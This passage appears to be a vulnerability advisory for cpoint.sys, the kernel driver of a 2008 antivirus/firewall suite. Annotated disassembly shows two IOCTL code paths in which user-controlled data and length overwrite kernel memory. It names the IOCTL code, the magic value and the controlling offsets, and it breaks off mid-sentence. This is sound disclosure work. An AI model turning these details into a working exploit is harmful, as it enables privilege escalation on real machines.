Security/Antivirus+Firewall 2008 accepts user supplied input that doesn't get validated enough. In consequence it is possible to cause an out-of-bound write in kernel memory. Disassembly of cpoint.sys (Windows Vista 32bit version): [...] .text:00012633 loc_12633: .text:00012633 mov edx, 0BA002848h <-- (1) .text:00012638 cmp ecx, edx .text:0001263A ja loc_12946 [...] .text:00012640 jz loc_128BE [...] .text:000128BE loc_128BE: .text:000128BE cmp [ebp+IOCTL_INPUT_SIZE], 1008h <-- (2) .text:000128C5 jb loc_12A7D [...] .text:000128CB mov esi, [ebp+IOCTL_INPUT_DATA] <-- (3) .text:000128CE cmp dword ptr [esi], 3F256B9Ah <-- (4) .text:000128D4 jnz loc_12A7D [...] .text:000128FF xor eax, eax .text:00012901 cmp [esi+8], eax <-- (5) .text:00012904 jbe short loc_1291B [...] (1) Vulnerable IOCTL call (2) IOCTL input size check (3) The user supplied data is copied into esi (4) + (5) Minor input data checks >From this point there are two different vulnerable code paths. Both will be described in the following: Vulnerable code path 1: [...] .text:00012906 lea ecx, [esi+0Ch] <-- (6) [...] .text:00012909 loc_12909: .text:00012909 mov edx, [ecx] <-- (7) .text:0001290B mov OVERWRITTEN_DATA[eax*4], edx <-- (8) .text:00012912 inc eax .text:00012913 add ecx, 4 .text:00012916 cmp eax, [esi+8] <-- (9) .text:00012919 jb short loc_12909 [...] (6) Some user controlled data is copied into ecx (7) The user controlled data is copied into edx (8) The user controlled data is copied (as dwords) at the memory location OVERWRITTEN_DATA (9) The size of the copied data (loop counter in eax) can be controlled by the user This leads to an out-of-bound write in kernel memory. Vulnerable code path 2: [...] .text:0001291B loc_1291B: .text:0001291B xor eax, eax .text:0001291D cmp [esi+10Ch], eax <-- (10) .text:00012923 jbe loc_129B4 [...] .text:00012929 lea ecx, [esi+110h] <-- (11) [...] .text:0001292F loc_1292F: .text:0001292F mov edx, [ecx] <-- (12) .text:00012931 mov OVERWRITTEN_DATA2[eax*4], edx <-- (13) .text:00012938 inc eax .text:00012939 add ecx, 4 .text:0001293C cmp eax, [esi+10Ch] <-- (14) .text:00012942 jb short loc_1292F [...] (10) Minor check of the user controlled data (11) Some user controlled data is copied into ecx (12) The user controlled data is copied into edx (13) The user controlled data is copied (as dwords) at the memory location OVERWRITTEN_DATA2 (14) The size of the copied data (loop counter in eax) can be controlled by the user This leads to an out-of-bound write in kernel memory. In both cases it is possible to write an arbitrary amount of user controlled data into kernel memory. As the data that gets overwritten is in the data